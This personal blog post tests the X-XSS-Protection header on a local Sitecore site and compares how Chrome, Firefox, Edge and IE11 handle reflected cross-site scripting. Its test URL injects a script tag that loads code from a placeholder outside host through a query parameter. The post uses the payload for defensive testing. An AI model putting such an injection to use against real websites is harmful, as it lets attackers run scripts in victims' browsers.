You can protect your self with headers without any need for code. Some of the headers which are recommended are:HTTP Strict Transport Security (HSTS)
HSTS informs browsers that the communication should only happen in HTTPS and not in HTTP.

X-Frame-Options
The X-Frame-Options header indicates if a browser should allow the render of a page in a frame, iframe or object. By implementing this header a site can avoid clickjacking attacks, by ensuring that the content is not embedded into other sites.

X-XSS-Protection
The X-XSS-Protection informs your browser to enable XSS filter in your browser. Not all browsers support this header.

X-Xss-Protection
This header configures the built in reflective XSS protection found in some modern browsers. Valid settings are:
0 – disable the protection
1 – enable the protection. If the browser detects an attack, the browser will sanitize the page
1; mode=block – enable the protection & block the response. If the browser detects an attack, the page will not be loaded and the browser wont sanitize the page
1; report=http://[YOURDOMAIN]/your_report_URI – enable the protection. If the browser detects an attack, he browser will sanitize the page and report the violation

By default we do not get many headers from the base install of Sitecore.

Lets do some testing.

X-Xss-Protection “0” – Disable

XHTML

1

2

3

4

5

6

7

8

9

<system.webServer>

<httpProtocol>

<customHeaders>

<add name="X-XSS-Protection"value="0" />

</customHeaders>

</httpProtocol>

</system.webServer>

Now we load http://local.testsc8.com/?special=%3Cscript%20src=%22https://somedomain.com/somescript.js%22%3E%3C/script%3E on a page which consumes the special query string parameter and renders it on the page causing the script to execute.

The header gets loaded as we expected but on closer look on all four browsers, each acts differently. Chrome and FF load the script where as Microsoft Edge and IE11 do not load the script. We also do not see any console output.

X-Xss-Protection “1” – Enable & Sanitize

XHTML

1

2

3

4

5

6

7

8

9

<system.webServer>

<httpProtocol>

<customHeaders>

<add name="X-XSS-Protection"value="1" />

</customHeaders>

</httpProtocol>

</system.webServer>

Now we load http://local.testsc8.com/?special=%3Cscript%20src=%22https://somedomain.com/somescript.js%22%3E%3C/script%3E . Something very interesting happens:

Chrome, Microsoft Edge and IE11 respect the header value of 1 and do not load the script.

Chrome, Microsoft Edge and IE11 show a console message.

Props to IE11 (never thought I would say this about IE), it even shows a very visible notification to the user.

Firefox on the other hand still loads the scripts and completely ignores the header.

Chrome does not load any content. No output in Network or Console tabs.

Firefox loads all the content including the offending script. No output in console.

Microsoft Edge and IE11 do not load any content. The console shows error message and the network tab shows the request.

As you can see each browser behaves differently. I would say in this case FireFox is the worst. We are unable to get full protection from all browsers with the X-XSS-Protection. This should show us that there is no silver bullet. We would need to implement multiple protections to remedy the XSS vulnerability.

Related

one Comment

For anyone adding X-Frame-Options, Sitecore 8.2 comes with a handler that adds this automatically. If you are building form using the RequestForgeryToken, you’ll notice that duplicate headers appear. Check out this article to see if it helps you hide the second: https://long2know.com/2016/03/asp-net-anti-forgery-configuration/

This is a personal blog. Any views or opinions represented in this blog are my own and do not represent those of people, institutions or organizations that the I may or may not be associated with in professional or personal capacity including past, current and future employers, unless explicitly stated.